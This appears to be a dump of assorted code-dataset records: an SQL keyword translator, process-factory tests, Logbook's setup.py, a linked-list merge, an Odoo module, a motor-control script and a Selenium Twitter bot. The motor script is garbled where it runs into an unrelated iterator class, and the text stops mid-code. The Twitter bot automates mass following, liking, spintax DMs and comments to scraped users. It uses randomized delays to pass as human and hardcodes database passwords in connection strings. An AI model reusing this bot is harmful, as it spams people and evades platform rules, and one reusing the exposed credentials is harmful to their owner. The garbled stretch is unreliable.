+{"seq_id":"147113009","text":"from os import linesep\n\nkeywords = {\n \" ?VYBER \": \"SELECT \",\n \" ?UPDATE \": \" AKTUALIZUJ \",\n \" ?VLOŽ DO \": \"INSERT INTO \",\n \" ?VYTVOŘ DATABÁZI \": \"CREATE DATABASE \",\n \" ?UPRAV DATABÁZI \": \"ALTER TABLE \",\n \" ?VYTVOŘ TABULKU \": \"CREATE TABLE \",\n \" ?UPRAV TABULKU\": \"ALTER TABLE \",\n \" ?SMAŽ TABULKU \": \"DROP TABLE \",\n \" ?VYTVOŘ INDEX \": \"CREATE INDEX \",\n \" ?SMAŽ INDEX \": \"DROP INDEX \",\n \" Z \": \" FROM \",\n \" KDE \": \" WHERE \",\n \" A \": \" AND \",\n \" NEBO \": \" OR \",\n \" NEPLATÍ \": \" NOT \",\n \" SEŘAĎ PODLE \": \" ORDER BY \",\n \" HODNOTY \": \" VALUES \",\n \" JE PRÁZDNÝ \": \" NULL \",\n \" NASTAV \": \" SET \",\n \" ?SMAŽ \": \"DELETE \",\n \" PŘIPOJ ZLEVA \": \" LEFT JOIN \",\n \" PŘIPOJ ZPRAVA \": \" RIGHT JOIN \",\n \" PŘIPOJ CELÉ \": \" FULL JOIN \",\n \" PŘIPOJ VNITŘNĚ \": \" INNER JOIN \",\n \" VŠE \": \" * \",\n f\"\\. 
|({linesep})\": \";\"\n }\n","sub_path":"src/translator/keywords.py","file_name":"keywords.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"515006498","text":"import os\nimport gc\nfrom multiprocessing import Pool\nimport queue\nfrom concurrent.futures import ThreadPoolExecutor\nimport pytest\nfrom cleanroom import factory\n\n\nclass DummyClass:\n\n SHOULD_NOT_TOUCH = 42\n\n def __init__(self, num=0, sleep=0):\n import time\n time.sleep(sleep)\n self.num = num\n\n def get(self):\n return self.num\n\n def inc(self):\n self.num += 1\n\n def pid(self, sleep=0):\n import os\n import time\n time.sleep(sleep)\n return os.getpid()\n\n def boom(self):\n raise RuntimeError('something wrong.')\n\n def env(self):\n import os\n return os.getenv('CLEANROOM_ENV_VAR')\n\n def return_type(self):\n a = {\n 'a': 42,\n 'b': ['nested'],\n }\n b = set()\n return a, b\n\n def echo(self, num):\n return num\n\n def echo_boom(self, num):\n if num > 100:\n raise ValueError('boom!')\n return num\n\n\nclass DummyClassCorruptedInit:\n\n def __init__(self):\n raise ValueError('something wrong.')\n\n\ndef check_pid(pid):\n try:\n os.kill(pid, 0)\n except OSError:\n return False\n else:\n return True\n\n\ndef test_create_proc_channel():\n proc1, in_queue1, out_queue1, _, _ = factory.create_proc_channel(DummyClass)\n in_queue1.put(None)\n assert out_queue1.get()[0]\n\n proc2, in_queue2, out_queue2, _, _ = factory.create_proc_channel(DummyClass)\n in_queue2.put(None)\n assert out_queue2.get()[0]\n\n in_queue1.put(('pid', (), {}))\n in_queue2.put(('pid', (), {}))\n assert out_queue1.get()[1] != out_queue2.get()[1]\n\n in_queue1.put(('get', (), {}))\n assert out_queue1.get()[1] == 0\n\n in_queue1.put(('inc', (), {}))\n assert out_queue1.get()[1] is None\n\n in_queue1.put(('get', (), {}))\n assert out_queue1.get()[1] == 1\n\n in_queue2.put(('get', (), {}))\n assert out_queue2.get()[1] == 0\n\n proc1.terminate()\n proc2.terminate()\n\n\ndef test_create_proc_channel_exception():\n proc, in_queue, out_queue, _, _ = factory.create_proc_channel(DummyClass)\n in_queue.put(None)\n assert out_queue.get()[0]\n\n in_queue.put(('boom', (), {}))\n good, out = out_queue.get()\n assert not good\n assert isinstance(out, factory.ExceptionWrapper)\n proc.join()\n assert not proc.is_alive()\n\n\ndef test_create_instance():\n proxy1 = factory.create_instance(DummyClass)\n proxy2 = factory.create_instance(DummyClass)\n\n assert proxy1.pid() != proxy2.pid()\n\n assert proxy1.get() == 0\n assert proxy1.inc() == None\n assert proxy1.get() == 1\n with pytest.raises(RuntimeError):\n proxy1.boom()\n\n proxy3 = factory.create_instance(DummyClass, factory.CleanroomArgs(42))\n assert proxy3.get() == 42\n\n proxy3 = factory.create_instance(DummyClass, factory.CleanroomArgs(num=42))\n assert proxy3.get() == 42\n\n\ndef test_gc():\n proxy = factory.create_instance(DummyClass)\n pid = proxy.pid()\n del proxy\n gc.collect()\n assert not check_pid(pid)\n\n\ndef test_timeout():\n\n with pytest.raises(factory.TimeoutException):\n factory.create_instance(\n DummyClass,\n factory.CleanroomArgs(sleep=3),\n timeout=1,\n )\n\n proxy = factory.create_instance(DummyClass, timeout=1)\n with pytest.raises(factory.TimeoutException):\n proxy.pid(sleep=3)\n\n\ndef test_create_instance_error():\n proxy = factory.create_instance(DummyClass)\n\n with pytest.raises(NotImplementedError):\n proxy.this_does_not_exists\n\n with pytest.raises(AttributeError):\n 
proxy.SHOULD_NOT_TOUCH\n\n with pytest.raises(TypeError):\n proxy.get(42)\n\n class DummyClassMethod:\n\n def _crw_instance_cls(self):\n pass\n\n with pytest.raises(AttributeError):\n factory.create_instance(DummyClassMethod)\n\n\ndef test_env(monkeypatch):\n monkeypatch.setenv('CLEANROOM_ENV_VAR', '42')\n\n proxy = factory.create_instance(DummyClass)\n assert proxy.env() == '42'\n\n\ndef test_return_type():\n proxy = factory.create_instance(DummyClass)\n a, b = proxy.return_type()\n\n\ndef test_thread_safe():\n proxy = factory.create_instance(DummyClass)\n assert proxy.echo(42) == 42\n\n num_list = list(range(1000))\n with Pool(10) as pool:\n assert list(pool.map(proxy.echo, num_list)) == num_list\n with ThreadPoolExecutor(max_workers=10) as pool:\n assert list(pool.map(proxy.echo, num_list)) == num_list\n\n\ndef test_thread_safe_error():\n proxy = factory.create_instance(DummyClass)\n\n proxy.echo_boom(0)\n with pytest.raises(ValueError):\n proxy.echo_boom(101)\n with pytest.raises(RuntimeError):\n proxy.echo_boom(101)\n\n\ndef test_init_error():\n with pytest.raises(ValueError):\n factory.create_instance(DummyClassCorruptedInit)\n\n\ndef test_random_access_scheduler():\n scheduler = factory.create_scheduler(5)\n factory.create_instances_under_scheduler(scheduler, DummyClass)\n all_pids = set(scheduler.pid() for _ in range(1000))\n assert len(all_pids) == 5\n\n\ndef test_batch_random_access_scheduler():\n scheduler = factory.create_scheduler(5, scheduler_type='batch_random_access')\n factory.create_instances_under_scheduler(scheduler, DummyClass)\n\n all_pids = set(scheduler.pid([factory.CleanroomArgs()] * 1000))\n assert len(all_pids) == 5\n","sub_path":"tests/test_factory.py","file_name":"test_factory.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"130188019","text":"r\"\"\"\nLogbook\n-------\n\nAn awesome logging implementation that is fun to use.\n\nQuickstart\n``````````\n\n::\n\n from logbook import Logger\n log = Logger('A Fancy Name')\n\n log.warn('Logbook is too awesome for most applications')\n log.error(\"Can't touch this\")\n\nWorks for web apps too\n``````````````````````\n\n::\n\n from logbook import MailHandler, Processor\n\n mailhandler = MailHandler(from_addr='servererror@example.com',\n recipients=['admin@example.com'],\n level='ERROR', format_string=u'''\\\n Subject: Application Error for {record.extra[path]} [{record.extra[method]}]\n\n Message type: {record.level_name}\n Location: {record.filename}:{record.lineno}\n Module: {record.module}\n Function: {record.func_name}\n Time: {record.time:%Y-%m-%d %H:%M:%S}\n Remote IP: {record.extra[ip]}\n Request: {record.extra[path]} [{record.extra[method]}]\n\n Message:\n\n {record.message}\n ''')\n\n def handle_request(request):\n def inject_extra(record, handler):\n record.extra['ip'] = request.remote_addr\n record.extra['method'] = request.method\n record.extra['path'] = request.path\n\n with Processor(inject_extra):\n with mailhandler:\n # execute code that might fail in the context of the\n # request.\n\"\"\"\n\nimport os\nimport platform\nimport sys\nfrom itertools import chain\n\nfrom distutils.command.build_ext import build_ext\nfrom distutils.errors import (\n CCompilerError, DistutilsExecError, DistutilsPlatformError)\nfrom setuptools import Distribution as _Distribution, Extension, setup\nfrom setuptools.command.test import test as TestCommand\n\ncmdclass = {}\nif sys.version_info < (2, 6):\n raise Exception('Logbook 
requires Python 2.6 or higher.')\n\ncpython = platform.python_implementation() == 'CPython'\n\next_modules = [Extension('logbook._speedups', sources=['logbook/_speedups.c'])]\n\next_errors = (CCompilerError, DistutilsExecError, DistutilsPlatformError)\nif sys.platform == 'win32':\n # 2.6's distutils.msvc9compiler can raise an IOError when failing to\n # find the compiler\n ext_errors += (IOError,)\n\n\nclass BuildFailed(Exception):\n def __init__(self):\n self.cause = sys.exc_info()[1] # work around py 2/3 different syntax\n\n\nclass ve_build_ext(build_ext):\n \"\"\"This class allows C extension building to fail.\"\"\"\n\n def run(self):\n try:\n build_ext.run(self)\n except DistutilsPlatformError:\n raise BuildFailed()\n\n def build_extension(self, ext):\n try:\n build_ext.build_extension(self, ext)\n except ext_errors:\n raise BuildFailed()\n except ValueError:\n # this can happen on Windows 64 bit, see Python issue 7511\n if \"'path'\" in str(sys.exc_info()[1]): # works with both py 2/3\n raise BuildFailed()\n raise\n\ncmdclass['build_ext'] = ve_build_ext\n\n\nclass Distribution(_Distribution):\n\n def has_ext_modules(self):\n # We want to always claim that we have ext_modules. This will be fine\n # if we don't actually have them (such as on PyPy) because nothing\n # will get built, however we don't want to provide an overally broad\n # Wheel package when building a wheel without C support. This will\n # ensure that Wheel knows to treat us as if the build output is\n # platform specific.\n return True\n\n\nclass PyTest(TestCommand):\n # from https://pytest.org/latest/goodpractises.html\\\n # #integration-with-setuptools-test-commands\n user_options = [('pytest-args=', 'a', 'Arguments to pass to py.test')]\n\n default_options = ['tests']\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = ''\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(\n ' '.join(self.default_options) + ' ' + self.pytest_args)\n sys.exit(errno)\n\ncmdclass['test'] = PyTest\n\n\ndef status_msgs(*msgs):\n print('*' * 75)\n for msg in msgs:\n print(msg)\n print('*' * 75)\n\nversion_file_path = os.path.join(\n os.path.dirname(__file__), 'logbook', '__version__.py')\n\nwith open(version_file_path) as version_file:\n exec(version_file.read()) # pylint: disable=W0122\n\nextras_require = dict()\nextras_require['test'] = set(['pytest', 'pytest-cov'])\n\nif sys.version_info[:2] < (3, 3):\n extras_require['test'] |= set(['mock'])\n\nextras_require['dev'] = set(['cython']) | extras_require['test']\n\nextras_require['execnet'] = set(['execnet>=1.0.9'])\nextras_require['sqlalchemy'] = set(['sqlalchemy'])\nextras_require['redis'] = set(['redis'])\nextras_require['zmq'] = set(['pyzmq'])\nextras_require['jinja'] = set(['Jinja2'])\nextras_require['compression'] = set(['brotli'])\n\nextras_require['all'] = set(chain.from_iterable(extras_require.values()))\n\n\ndef run_setup(with_cext):\n kwargs = {}\n if with_cext:\n kwargs['ext_modules'] = ext_modules\n else:\n kwargs['ext_modules'] = []\n\n setup(\n name='Logbook',\n version=__version__,\n license='BSD',\n url='http://logbook.pocoo.org/',\n author='Armin Ronacher, Georg Brandl',\n author_email='armin.ronacher@active-4.com',\n description='A logging replacement for Python',\n long_description=__doc__,\n packages=['logbook'],\n zip_safe=False,\n 
platforms='any',\n cmdclass=cmdclass,\n tests_require=['pytest'],\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n\n ],\n extras_require=extras_require,\n distclass=Distribution,\n **kwargs\n )\n\nif not cpython:\n run_setup(False)\n status_msgs(\n 'WARNING: C extensions are not supported on ' +\n 'this Python platform, speedups are not enabled.',\n 'Plain-Python build succeeded.'\n )\nelif os.environ.get('DISABLE_LOGBOOK_CEXT'):\n run_setup(False)\n status_msgs(\n 'DISABLE_LOGBOOK_CEXT is set; ' +\n 'not attempting to build C extensions.',\n 'Plain-Python build succeeded.'\n )\nelse:\n try:\n run_setup(True)\n except BuildFailed as exc:\n status_msgs(\n exc.cause,\n 'WARNING: The C extension could not be compiled, ' +\n 'speedups are not enabled.',\n 'Failure information, if any, is above.',\n 'Retrying the build without the C extension now.'\n )\n\n run_setup(False)\n\n status_msgs(\n 'WARNING: The C extension could not be compiled, ' +\n 'speedups are not enabled.',\n 'Plain-Python build succeeded.'\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"223451483","text":"# In this problem, we are given k sorted lists and we are required to merge these into a single list.\n# The algorithm is a divide and conquer one as it basically splits the list of lists in half and then sorts them and then merges them resulting in a good time complexity\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if lists == [] :\n return None\n if len(lists) == 1 :\n return lists[0]\n pos = len(lists) // 2\n node_1 = self.mergeKLists(lists[:pos])\n node_2 = self.mergeKLists(lists[pos:])\n node_3 = merge_two_lists(node_1, node_2)\n return node_3\ndef merge_two_lists(first, second) :\n if not first:\n return second\n if not second :\n return first\n i = 0\n if (first.val <= second.val) :\n val = first.val\n node = ListNode(val)\n node.next = merge_two_lists(first.next, second)\n else :\n val = second.val\n node = ListNode(val)\n node.next = merge_two_lists(first, second.next)\n return node \n","sub_path":"merging_k_sorted_lists.py","file_name":"merging_k_sorted_lists.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570256291","text":"from can import CAN_Bus\nfrom sensors import Sensors\nfrom motors.gyems import GyemsDRC\nfrom time import perf_counter, sleep\nfrom multiprocessing import Process, Array, Lock, Value\nimport matplotlib.pyplot as plt\nfrom math import cos, pi\nimport pandas as pd\n# import numpy as np\n\nRUN_TIME=10\n\nTSA_stand = {'actuator_interface':'can1', 'id':0x148, # actuator data\n 'current_limit':1000, 'gains': {'kp':5, 'kd': 4.0},'control':'motor', # control data \n # control types: 'motor' (default), 'linear_ee', 'rotational_ee'\n 'sensors_interface':'can0', # sensor data\n 'amplitude':360,'period':10} # trajectory parameters\n\ndef harmonic_trajectory(t,A=20,A0=None,T=5):\n if A0==None:\n A0=A\n return A0-A*cos(t*2*pi/T)\n\ndef pd_control(device,q_d,dq_d=0):\n data={}\n actuator=device['actuator']\n sensor=device['sensors']\n sensor.recieve_data()\n\n if 
device['control']=='linear_ee':\n q, dq = sensor.lin, sensor.speed_lin\n elif device['control']=='rotational_ee':\n q, dq = sensor.angle, sensor.speed_angle\n else:\n q, dq = actuator.state['angle'], actuator.state['speed']\n\n e, de = q_d - q, dq_d - dq\n \n i=actuator.state['current']\n i_d = device['gains']['kp']*e + device['gains']['kd']*de\n actuator.set_current(i_d)\n \n data['q_d']=q_d\n data['dq_d']=dq_d\n data['i_d']=i_d\n data['q']=q\n data['dq']=dq\n data['i']=i\n\n return data\n\ndef plot_results(t,y_d,y,y_label='Position [deg]',title='Position plot'):\n plt.plot(t,y_d,'r',label='Desired',linewidth=2.0)\n plt.plot(t,y,'b',label='Actual',linewidth=2.0)\n\n plt.grid(color='black', linestyle='--', linewidth=1.0, alpha = 0.7)\n plt.grid(True)\n plt.legend()\n\n plt.xlabel('Time [sec]')\n plt.ylabel(y_label)\n plt.title(title)\n plt.savefig(title+'.png')\n plt.clf()\n return\n\nTSA_stand['actuator_bus'] = CAN_Bus(interface = TSA_stand['actuator_interface'])\nTSA_stand['actuator'] = GyemsDRC(can_bus=TSA_stand['actuator_bus'], device_id=TSA_stand['id'])\nTSA_stand['actuator'].set_degrees()\nTSA_stand['actuator'].current_limit = TSA_stand['current_limit']\nTSA_stand['actuator'].set_zero(persistant=True)\nTSA_stand['actuator'].enable()\n\nTSA_stand['sensor_bus']=CAN_Bus(interface=TSA_stand['sensors_interface'])\nTSA_stand['sensors']=Sensors(can_bus=TSA_stand['sensor_bus'])\n\ndata = {'t':[], 'q_d':[], 'dq_d':[], 'i_d':[], 'q':[], 'dq':[], 'i':[]}\nfeedback_labels=['q_d','dq_d','i_d','q','dq','i']\n\nt0=perf_counter()\nt=0\ntry:\n while t= self.maxtimes:\n raise StopIteration\n \n value = self.data[self.index % len(self.data)]\n self.index += 1\n return value\n \n\nclass Circle:\n def __init__(self, data, maxtimes):\n self.data = data\n self.maxtimes = maxtimes\n \n def __iter__(self):\n return CircleIterator(self.data, self.maxtimes)\n \n\n\nc = Circle('abcd', 7) \n\n# abcdabc\nprint('** A **')\nfor one_item in c:\n print(one_item)\n \nprint('** B **')\nfor one_item in c:\n print(one_item)","sub_path":"ex47.py","file_name":"ex47.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199301082","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\n\nclass PurchaseOrder(models.Model):\n _name = 'purchase.order'\n _inherit = 'purchase.order'\n\n signature_image = fields.Binary(string='Signature')\n signature_added = fields.Boolean(\"Signature added?\", default=False)\n\n @api.multi\n def button_confirm(self):\n if self.signature_added == True:\n for order in self:\n if order.state not in ['draft', 'sent']:\n continue\n order._add_supplier_to_product()\n # Deal with double validation process\n if order.company_id.po_double_validation == 'one_step' \\\n or (order.company_id.po_double_validation == 'two_step' and \\\n order.amount_total < self.env.user.company_id.currency_id.compute(\n order.company_id.po_double_validation_amount, order.currency_id)) \\\n or order.user_has_groups('purchase.group_purchase_manager'):\n order.button_approve()\n else:\n order.write({'state': 'to approve'})\n return True\n else:\n raise UserError(\"Please, Get a signature from manager.\")\n\n","sub_path":"ht_get_digital_approval/models/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575426186","text":"import os, sys\n\nfrom 
selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nfrom datetime import datetime\n\n\nfrom time import sleep\nimport random\nimport spintax\nfrom pymongo import MongoClient\n\nimport csv\nimport logging\nimport xlrd\nimport json\nimport re\nimport math\n\nlogging.basicConfig(filename=\"logfilename.log\", level=logging.INFO)\n\nclass Bot:\n def __init__(self):\n self.driver = \"\"\n self.path_to_chromedriver = \"C:/Users/Administrator/Documents/bot/chromedriver.exe\"\n self.browser_url = \"\"\n self.target_url = \"https://twitter.com/messages\"\n self.home_url = \"https://twitter.com/home\"\n self.base_url = \"https://twitter.com/\"\n self.notification_url = \"https://twitter.com/notifications\"\n self.spintax_url = \"https://www.linkcollider.com/page/spintaxtester\"\n self.msg1_url = \"\"\n self.msg2_url = \"\"\n self.comment_url = \"\"\n self.cnt = 0\n self.browser_port_list = [9230]\n self.account_username_list = [\"@HildaRo49368042\"]\n self.account_username = \"\"\n self.profile_index = 0\n # self.browser_port_list = [9228,9227]\n self.excelPath = \"C:\\\\Users\\\\Administrator\\\\Documents\\\\bot\\\\files\\\\data.csv\"\n self.publicProfileStep = []\n self.privateProfileStep = []\n self.username = ''\n self.name = ''\n self._id = ''\n self.user_id = ''\n self.url = ''\n\n self.client = \"\"\n self.username_db = \"\"\n\n def driver_startup(self, port):\n chrome_options = Options()\n self.browser_url = f\"127.0.0.1:{port}\"\n chrome_options.add_experimental_option(\"debuggerAddress\", self.browser_url)\n self.driver = webdriver.Chrome(self.path_to_chromedriver, options=chrome_options)\n\n def getDbData(self):\n client = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?authSource=admin&replicaSet=atlas-4jftde-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\n mongodb = client[\"peachly_twitter_tweets_usernames\"]\n collection = mongodb[\"usernames\"]\n for x in collection.find({},{\"_id\":\"0\", \"user_id\":\"1\",\"username\": \"1\"}):\n print(type(x),x)\n return collection\n\n def saveData(self, data):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?retryWrites=true&w=majority')\n print(\"69\")\n mydb = myclient[\"peachly_dms_disabled\"]\n private = mydb[\"private\"]\n public = mydb[\"public\"]\n print(\"ok\", data)\n res = public.insert_one(data)\n print(\"doneee\", res.inserted_id)\n\n def saveMsg(self, data):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n messages = db['messages']\n res = messages.insert_one(data)\n print(\"msg saved\", res.inserted_id)\n\n def saveNewMsg(self, data):\n myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n db = myclient[\"peachly_twitter_bots\"]\n messages = db['new_messages']\n res = messages.insert_one(data)\n print(\"msg saved\", res.inserted_id)\n\n def saveComment(self, data):\n db = self.client[\"peachly_twitter_bots\"]\n comments = db['comments']\n res = 
comments.insert_one(data)\n        print(\"comment saved\", res.inserted_id)\n\n    def getMsg(self, username, coming_time):\n        myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n        db = myclient[\"peachly_twitter_bots\"]\n        messages = db['messages']\n        print(\"here is result\")\n        for x in messages.find({}):\n            print(x)\n            if x[\"username\"] == username and x[\"coming_time\"] == coming_time:\n                return True\n        return False\n\n    def getReplyMsg(self):\n        myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n        db = myclient[\"peachly_twitter_bots\"]\n        reply_messages = db['reply_messages']\n        return reply_messages\n\n    def updateComment(self, u_name, reply_content, time):\n        db = self.client[\"peachly_twitter_bots\"]\n        comments = db['comments']\n        result = comments.find({\"to_username\": u_name, \"coming_time\": time, \"content\": reply_content}, {})\n        if result.count() == 0:\n            #save in the db\n            dateTimeObj = datetime.now()\n            data = {\n                \"to_username\": u_name,\n                \"account_username\": self.account_username,\n                \"coming_time\": time,\n                \"save_time\": dateTimeObj,\n                \"bot_number\":2,\n                \"profile\": self.profile_index\n            }\n            self.saveComment(data)\n            return True\n        else:\n            return False\n\n    def updateReport(self, updateField):\n        myclient = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/peachly_twitter_bots?authSource=admin&replicaSet=atlas-4jftde-shard-0&w=majority&readPreference=primary&appname=MongoDB%20Compass&retryWrites=true&ssl=true')\n        db = myclient[\"peachly_twitter_bots\"]\n        reply_messages = db['reports']\n        print(\"inside suc dm report\")\n        if reply_messages.count() == 0:\n            print(\"ok\")\n            data = {\n                \"bot1_successful_dm\": 0,\n                \"bot1_unsuccessful_dm\":0,\n                \"bot1_spintax1_reply\": 0,\n                \"bot2_successful_dm\": 0,\n                \"bot2_unsuccessful_dm\":0,\n                \"bot2_spintax1_reply\": 0,\n            }\n            reply_messages.insert_one(data) \n        else:\n            print(\"else\")\n            for x in reply_messages.find({}):\n                reply_messages.update_one({\"_id\": x[\"_id\"]}, {\"$inc\": {updateField:1}}) \n\n    def checkIfSpintax2Reply(self, username):\n        client = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?authSource=admin&replicaSet=atlas-4jftde-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\n        mongodb = client[\"peachly_twitter_tweets_usernames\"] \n        col = mongodb[\"public\"]\n        result = col.find({\"username\": username}, {\"spintax2_reply\": \"1\"})\n        if result.count() == 0:\n            return False\n        else:\n            return True\n\n\n    def manage(self,public_or_private, msg1, msg2, commentURL,userNum):\n        print(\"bot starts\")\n        self.msg1_url = msg1\n        self.msg2_url = msg2\n        self.comment_url = commentURL\n        # self.publicProfileStep = publicStep\n        # self.privateProfileStep = privateStep\n        self.client = MongoClient('mongodb+srv://wang:lasQ7q350LVsRQWm@cluster0.asfo1.mongodb.net/test?authSource=admin&replicaSet=atlas-4jftde-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\n        self.username_db = self.client[\"peachly_twitter_tweets_usernames\"]\n\n        self.twitter_bot_db = self.client[\"peachly_twitter_bots\"]\n        bot_collection = self.twitter_bot_db[\"bot_infos\"]\n        reply_msg_collection = 
self.twitter_bot_db[\"reply_messages\"]\n comment_collection = self.twitter_bot_db[\"reply_comments\"]\n used_account_col = self.twitter_bot_db['used_leads']\n report_col = self.twitter_bot_db[\"reports\"]\n collection = self.username_db[public_or_private]\n print(type(collection))\n self.username_collection = collection\n index = 1\n\n\n for each_user in used_account_col.find({}):\n self._id = each_user['_id']\n self.username = each_user['username']\n self.url = each_user['url']\n print(\"each\", each_user)\n for each_item in each_user:\n print(\"1000\", each_user[each_item])\n current_time = datetime.now()\n if each_item == \"dm\" and each_user[each_item] == True:\n dm_time = each_user[\"dm_time\"]\n print(\"dm_time\", dm_time)\n time_diff = current_time - dm_time\n time_diff_hour = math.floor(time_diff.total_seconds() / 3600)\n if (time_diff_hour >= 48):\n print(\"205\")\n #check the dms once more\n\n #update the report\n bot_num = each_user[\"bot_number\"]\n for x in report_col.find({\"bot_number\": bot_num}):\n report_col.update_one({\"_id\": x[\"_id\"]}, {\"$inc\": {\"expired_dm\":1}}) \n\n collection.update_one({\"username\": each_user['username']}, {\"$set\": {'dm_expired': True}})\n used_account_col.update_one({\"_id\": each_user['_id']}, {\"$set\": {'dm': False, 'dm_expired': True}})\n\n\n elif each_item == \"comment\" and each_user[each_item] == True:\n comment_time = each_user[\"comment_time\"]\n print(\"comment_time\", comment_time)\n time_diff = current_time - comment_time\n time_diff_hour = math.floor(time_diff.total_seconds() / 3600)\n print(math.floor(time_diff.total_seconds() / 3600))\n if (time_diff_hour >= 48):\n print(\"comment expired\")\n #check the comment reply once more\n\n #update the report\n bot_num = each_user[\"bot_number\"]\n for x in report_col.find({\"bot_number\": bot_num}):\n report_col.update_one({\"_id\": x[\"_id\"]}, {\"$inc\": {\"expired_comment\":1}}) \n print(\"here\")\n\n collection.update_one({\"username\": each_user['username']}, {\"$set\": {'comment_expired': True}})\n used_account_col.update_one({\"_id\": each_user['_id']}, {\"$set\": {'comment': False, 'comment_expired': True}})\n\n # delete\n # used_account_col.delete_one({\"_id\": each_user['_id']})\n\n print(\"index\", index)\n index = index + 1\n return \"end\"\n \n\n def follow(self):\n self.driver.get(self.home_url)\n sleep(random.randint(5,7))\n search_input = self.driver.find_element_by_xpath('//form[@aria-label=\"Search Twitter\"]//input')\n search_input.send_keys(self.username)\n sleep(random.randint(3,6))\n\n first_item = self.driver.find_element_by_xpath('//div[@role=\"listbox\"]//div[@role=\"option\"][2]').click()\n sleep(random.randint(3,5))\n print(\"following...\")\n try:\n follow_btn = self.driver.find_element_by_xpath('//div[@data-testid=\"placementTracking\"]//div[@role=\"button\"]').click()\n sleep(random.randint(3,5))\n #update the status field in the database\n # following_person = AccountInfo.query.filter_by(username=self.username).first()\n # print(\"dddbbb\", following_person, following_person.status)\n # following_person.status = \"following\"\n # db.session.commit()\n\n return True\n\n except:\n sleep(1)\n #update the status field in the database\n # following_person = AccountInfo.query.filter_by(username=self.username).first()\n # print(\"dddbbb\", following_person, following_person.status)\n # following_person.status = \"suspended\"\n # db.session.commit()\n \n return False\n\n\n def likeTweets(self):\n print(\"like tweets started\")\n 
self.driver.get(self.home_url)\n sleep(random.randint(2,5))\n search_input = self.driver.find_element_by_xpath('//form[@aria-label=\"Search Twitter\"]//input')\n search_input.send_keys(self.username)\n sleep(random.randint(3,5))\n first_item = self.driver.find_element_by_xpath('//div[@role=\"listbox\"]//div[@role=\"option\"][2]').click()\n sleep(random.randint(2,4))\n try:\n like_elements = self.driver.find_elements_by_xpath('//section[@role=\"region\"]/div/div//div//article//div[@data-testid=\"like\"]')\n index = 0\n for each_like in like_elements:\n each_like.click()\n sleep(random.randint(5,7))\n index = index + 1\n if index == 2 :\n break\n except:\n sleep(2)\n pass\n return True\n\n def comment(self):\n print(\"comment started\")\n try:\n #get url of the name\n profile_link = self.base_url + self.username\n self.driver.get(profile_link)\n sleep(5)\n print(\"633\")\n comment_elements = self.driver.find_elements_by_xpath('//section[@role=\"region\"]/div/div//div//article//div[@data-testid=\"reply\"]')\n comment_elements[0].click()\n sleep(random.randint(4,6))\n print(\"65656\")\n # pyauto gui\n self.driver.get(self.spintax_url)\n sleep(random.randint(7,10))\n print(\"6660\")\n\n self.driver.get(self.comment_url)\n print(\"hereee\")\n sleep(10)\n # run pyautogui\n pyautogui_class = PyAutoGuiClass()\n pyautogui_class.pySpintaxComment()\n \n sleep(5)\n sleep(random.randint(4,6))\n print(\"6666\")\n\n reply_button = self.driver.find_element_by_xpath('//div[@data-testid=\"tweetButton\"]/div')\n reply_button.click()\n sleep(random.randint(3,4))\n self.driver.minimize_window()\n #save in the db\n dateTimeObj = datetime.now()\n data = {\n \"to_username\": self.username,\n \"account_username\": self.account_username,\n \"coming_time\": \"\",\n 